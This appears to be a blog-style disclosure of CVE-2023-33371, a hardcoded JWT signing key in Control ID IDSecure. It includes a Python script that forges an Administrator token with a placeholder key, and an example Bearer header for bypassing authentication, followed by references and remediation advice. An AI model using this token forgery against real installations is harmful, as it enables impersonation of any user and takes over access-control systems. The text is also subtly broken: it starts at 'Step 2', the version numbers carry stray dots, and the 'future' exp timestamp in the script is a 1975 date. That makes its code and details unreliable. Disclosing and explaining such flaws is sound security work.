CVE-2023-33371 - How Hardcoded JWT Key in Control ID IDSecure 4.7.26. Lets Attackers Bypass Authentication

CVE-2023-33371 is a newly disclosed and critical vulnerability found in Control ID IDSecure versions 4.7.26. and earlier. The core issue? The software uses a hardcoded cryptographic key for signing and verifying JWT session tokens. This means attackers can easily generate their own tokens that the system will accept, letting them bypass authentication altogether. In this post, we’ll break down the vulnerability, show how an exploit works, and point you to more resources.

What Is Control ID IDSecure?

Control ID IDSecure is an access control and identity management platform used by companies to manage physical and logical access to their premises and systems. It uses JSON Web Tokens (JWTs) for authentication and session management.

Hardcoded JWT Key

Control ID IDSecure uses a secret key to sign JWTs, ensuring that only tokens it creates are accepted as authentic. But version 4.7.26. and below ship with the secret key built right into the code—the same key everywhere. This is called a hardcoded cryptographic key, and it’s a big no-no for security.

If attackers know this key, they can create their own JWTs with any identity or permissions they want, and the system will treat them as legitimate.

Let’s say the key is

super_secret_idsecure_key

*NOTE: This is a placeholder; the real key may vary but is fixed for all installations up to and including v4.7.26..*

Step 2: Generate a Malicious JWT

Using a JWT library such as Python’s pyjwt, an attacker can generate a token with any user ID or admin role.

import jwt

# The hardcoded secret key from IDSecure 4.7.26.
secret = 'super_secret_idsecure_key'

# Payload can impersonate any user
payload = {
    "user_id": "admin",
    "role": "Administrator",
    "exp": 173568960  # Any future timestamp
}

# Encode the JWT
token = jwt.encode(payload, secret, algorithm='HS256')
print(token)

This token can now be used as a session cookie or header for API requests, and the server will treat it as genuine.

Step 3: Bypass Authentication

By including the malicious JWT in an Authorization header or as a session cookie, you now have admin access or access as any user you choose.

Example HTTP Header

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Complete authentication bypass: Any user, including admins, can be impersonated.

- System compromise risk: Attackers can take full control of the application, modify configurations, and access sensitive data.

References

- NIST NVD: CVE-2023-33371
- Exploit Details on Exploit-DB (Example for similar JWT auth bypass)
- OWASP JWT Cheat Sheet
- Control ID Product Page

Remediation

- Upgrade to a patched version of IDSecure where the key is not hardcoded and can be configured securely.

Conclusion

CVE-2023-33371 is a text book example of how hardcoding secret cryptographic keys leads to catastrophic vulnerabilities. It lets attackers create their own keys to the kingdom. If you use Control ID IDSecure 4.7.26. or lower, you must update and rotate your keys ASAP.

Timeline

Published on: 08/03/2023 01:15:00 UTC
Last modified on: 08/05/2023 03:47:00 UTC